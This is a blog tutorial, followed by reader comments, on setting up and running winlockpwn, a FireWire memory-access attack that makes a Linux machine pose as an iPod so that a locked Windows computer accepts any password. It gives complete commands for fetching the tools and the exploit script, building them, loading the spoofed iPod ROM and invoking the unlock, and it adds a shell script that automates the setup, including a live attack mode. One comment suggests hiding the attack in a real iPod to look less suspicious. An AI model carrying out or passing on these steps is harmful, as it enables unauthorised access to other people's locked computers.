sudo aptitude install libdc1394-13 libraw1394-dev swig python
Now we need to download and install Python 2.3, because I could not get the bindings to run under Python 2.5:
wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar -zxvf Python-2.3.6.tgz
cd Python-2.3.6
./configure
make
sudo make install
The next step is to modify the libraw1394 header:
sudo vim /usr/include/libraw1394/raw1394.h
Search raw1394.h for "__attribute__((deprecated));" and comment out every line that contains it. Use a C comment (/* ... */ or //), not a #: in a C header a leading # starts a preprocessor directive, and the build will then fail with "invalid preprocessing directive #__attribute__". Each of those lines also carries the semicolon that ends the declaration started on the line above it, so when you comment one out, terminate the line above it with a semicolon. Once all of them are commented out, save and close the file. The next step is to get the pythonraw1394 library from Adam's site; it contains the Python bindings for libraw1394, plus romtool and businfo.
wget http://www.storm.net.nz/static/files/pythonraw1394-1.0.tar.gz
And of course, we need to untar it:
tar -zxvf pythonraw1394-1.0.tar.gz
Now we need to go into the untarred directory and download the actual winlockpwn script:
cd pythonraw1394
wget http://www.storm.net.nz/static/files/winlockpwn
The winlockpwn script needs to live in the pythonraw1394 directory, because it imports the firewire module from there; anywhere else it won't work without modifying the code. We also need to make it executable:
chmod +x winlockpwn
Now we also need to edit the Makefile for pythonraw1394 to point it at Python 2.3's include directory:
sudo vim Makefile
Change /usr/include/python2.3 to /usr/local/include/python2.3 on lines 5 and 6 (the source build above installs under /usr/local, not /usr). Again, save and quit, then compile with the following command:
sudo make
The raw1394 kernel module also needs to be loaded and the permissions changed on the raw1394 device:
sudo modprobe raw1394
sudo chmod 666 /dev/raw1394
Mode 666 makes the device readable and writable by every local user; that is fine on a lab box, but not something to leave in place. Now we need to plug into the Windows machine and then edit romtool to reflect the location of Python:
sudo vim romtool
Change #!/usr/bin/python to #!/usr/local/bin/python on the first line of the file.
Repeat the same step for the winlockpwn script as well.
Then load the iPod image onto the FireWire port:
./romtool -s 0 ipod.csr
Loading the iPod image onto the FireWire port fools Windows into thinking your Linux box is an iPod: romtool writes the configuration ROM from ipod.csr onto host adapter 0, so the Windows side sees a FireWire storage device and gives it direct access to physical memory, which is what winlockpwn relies on.
Now we can run businfo (it is in the same pythonraw1394 directory) to make sure the iPod image is loaded, to see which port number it is on, and to make sure you can see the computer on the other end. Mine showed the iPod image loaded on port 0 and my Windows box at node 1.
Now, the fun part! Run winlockpwn as follows:
winlockpwn port node target
port and node are the numbers businfo reported for the iPod image and for the Windows machine, and target is the index of the Windows version in winlockpwn's built-in target list. Mine looked like this:
./winlockpwn 0 1 1
Once you run winlockpwn, the Windows box will accept any password you choose to give it (even a blank password) and unlock the system for you.
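The three manual edits above (strip the deprecated attributes from raw1394.h, repoint the Makefile at /usr/local, fix the shebangs) are exactly where the build goes wrong, so it is worth scripting them. The script below is an added example, not part of the original post and not code from Adam's pythonraw1394: it applies each edit with sed so that the semicolon is kept and no # ends up in the header, checks the result on a constructed excerpt in the shape of raw1394.h, and only touches the real files and the FireWire bus when WINLOCKPWN_LIVE=1 (a variable of my own) and it is run as root from the pythonraw1394 directory. The header excerpt, the Makefile line and the raw1394_old_style declaration in the self-check are constructed sample input.

```shell
#!/bin/sh
# Added example (not from the post or from pythonraw1394): script the manual
# edits from the write-up so they come out the same every time, and check
# them on constructed sample files before touching the real ones.

# Comment out every "__attribute__((deprecated));" in a C header while keeping
# the ';' that terminates the declaration it belongs to. A C comment is used:
# a '#' in front would turn the line into an invalid preprocessor directive.
# Handles the attribute on its own line and at the end of a declaration line.
# Idempotent: an already-commented line is left alone. A .orig backup is kept.
strip_deprecated() {
    sed -i.orig \
        -e 's|^\([[:space:]]*\)__attribute__((deprecated));|\1; /* __attribute__((deprecated)); */|' \
        -e 's|\([^*]\) __attribute__((deprecated));|\1; /* __attribute__((deprecated)); */|' \
        "$1"
}

# Number of lines still carrying a live (uncommented) deprecated attribute.
live_deprecated_count() {
    grep -c '^[[:space:]]*__attribute__((deprecated));' "$1" || true
}

# Syntax-check the edited header as C; returns 0 if gcc accepts it
# (or if gcc is not installed, in which case the check is skipped).
header_compiles() {
    command -v gcc >/dev/null 2>&1 || { echo "gcc not found, skipping syntax check"; return 0; }
    gcc -fsyntax-only -x c "$1"
}

# Point the pythonraw1394 Makefile at the Python 2.3 built from source.
fix_makefile_includes() {
    sed -i.orig 's|/usr/include/python2\.3|/usr/local/include/python2.3|g' "$1"
}

# Rewrite the shebang of romtool / winlockpwn to the /usr/local Python.
fix_shebang() {
    sed -i.orig '1s|^#!/usr/bin/python$|#!/usr/local/bin/python|' "$1"
}

# ---- self-check on constructed sample files (NOT the real headers) ----
WORK=$(mktemp -d)
cat > "$WORK/raw1394.h" <<'EOF'
/* constructed excerpt in the shape of libraw1394's raw1394.h */
#include <stddef.h>
typedef struct raw1394_handle *raw1394handle_t;
typedef unsigned int quadlet_t;
int raw1394_update_config_rom(raw1394handle_t handle, const quadlet_t *new_rom,
        size_t size, unsigned char rom_version)
    __attribute__((deprecated));
int raw1394_get_config_rom(raw1394handle_t handle, quadlet_t *buffer,
        size_t buffersize, size_t *rom_size, unsigned char *rom_version)
    __attribute__((deprecated));
int raw1394_old_style(raw1394handle_t handle) __attribute__((deprecated));
EOF
# constructed lines in the shape of the pythonraw1394 Makefile and scripts
printf 'CFLAGS=-Wall -shared -fPIC -I/usr/include/python2.3 -I/usr/include/libraw1394\n' > "$WORK/Makefile"
printf '#!/usr/bin/python\nimport firewire\n' > "$WORK/romtool"

strip_deprecated "$WORK/raw1394.h"
fix_makefile_includes "$WORK/Makefile"
fix_shebang "$WORK/romtool"
echo "live deprecated attributes left: $(live_deprecated_count "$WORK/raw1394.h")"
header_compiles "$WORK/raw1394.h" && echo "edited header passes gcc -fsyntax-only"

# ---- live steps from the write-up; run as root from the pythonraw1394 dir ----
run_live() {
    strip_deprecated /usr/include/libraw1394/raw1394.h
    fix_makefile_includes Makefile
    fix_shebang romtool
    fix_shebang winlockpwn
    chmod +x winlockpwn
    make
    modprobe raw1394
    chmod 666 /dev/raw1394   # lab only: every local user can now drive the bus
    ./romtool -s 0 ipod.csr  # present host adapter 0 to Windows as an iPod
    ./businfo                # confirm the image and find the Windows node
}
if [ "${WINLOCKPWN_LIVE:-0}" = 1 ]; then run_live; fi
```

Running it without WINLOCKPWN_LIVE only exercises the sample files under a temporary directory, so you can confirm the sed expressions leave a header that gcc still accepts before pointing them at /usr/include.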
There are many security issues that arise from winlockpwn. What is to stop a member of the janitorial staff from walking into the CEO's office after hours and getting straight into his machine, just because all he did before going home was lock the screen? It shows, once again, that once someone has physical access, it's game over.
---
Danny Howerton
http://metacortexsecurity.com
6 comments:
Great write-up. I'm really interested in all the physical memory stuff that's been buzzing around lately. I've no idea if this is possible or if it would all fit, but what would make this really cool would be if someone could write it all into a real iPod's firmware instead of just fooling Windows into thinking a laptop is an iPod. Casually plugging your iPod into a machine would look much less suspicious.
I have been discussing the same thing with some of my work buddies and I definitely agree. I imagine it wouldn't be that hard, granted you load Linux on the iPod. Now, I don't own an iPod, so I am not able to try that out. If anyone would be willing to donate one, I would be more than happy to play with it a little.
Great article. Thanks for taking the time to explain every step so clearly.
Thanks for the tutorial, dude.
I'm running into the following problems:
1. When I run "./romtool -s 0 ipod.csr" the output seems fine, but dmesg says "hpsb_update_config_rom() is deprecated" and "ieee1394: Failed to generate Configuration ROM image for host 0"
2. I get an "Errno 22, Invalid Argument" error when using "./winlockpwn 0 1 1" (see line 446 of firewire.py).
I've tried different cables without success. I'm able to use "./romtool -o 0 0 othernode.csr" without problem though.
Could you help me ?
I have the same problem.
I get an "Errno 22, Invalid Argument" error when using "
File "./winlockpwn", line 163, in ?
mem = n.read(offset + so , len(pattern))
File "/home/shad0w/Pulpit/instalki/pythonraw1394/firewire.py", line 715, in read
or
File "/home/shad0w/Pulpit/instalki/pythonraw1394/firewire.py", line 314, in __getitem_
on a different node.
I get this on every computer I have.
Just so you know, I am a newbie at this stuff, so please bear with me.
I followed the tutorial to the letter but when I got to the (sudo make) command in pythonraw1394, I got this output:
mario@Tahboo:~/pythonraw1394$ sudo make
[sudo] password for mario:
cc -Wall -shared -fPIC -I/usr/local/include/python2.3 -I/usr/include/libraw1394 raw1394_wrap.c -lraw1394 -o _raw1394.so
In file included from raw1394_wrap.c:2505:
/usr/include/libraw1394/raw1394.h:1216:2: error: invalid preprocessing directive #__attribute__
/usr/include/libraw1394/raw1394.h:1230:2: error: invalid preprocessing directive #__attribute__
/usr/include/libraw1394/raw1394.h:1242:2: error: invalid preprocessing directive #__attribute__
/usr/include/libraw1394/raw1394.h:1272:2: error: invalid preprocessing directive #__attribute__
/usr/include/libraw1394/raw1394.h:1283:2: error: invalid preprocessing directive #__attribute__
make: *** [_raw1394.so] Error 1
Could you please tell me what I am missing? Thanks
Mario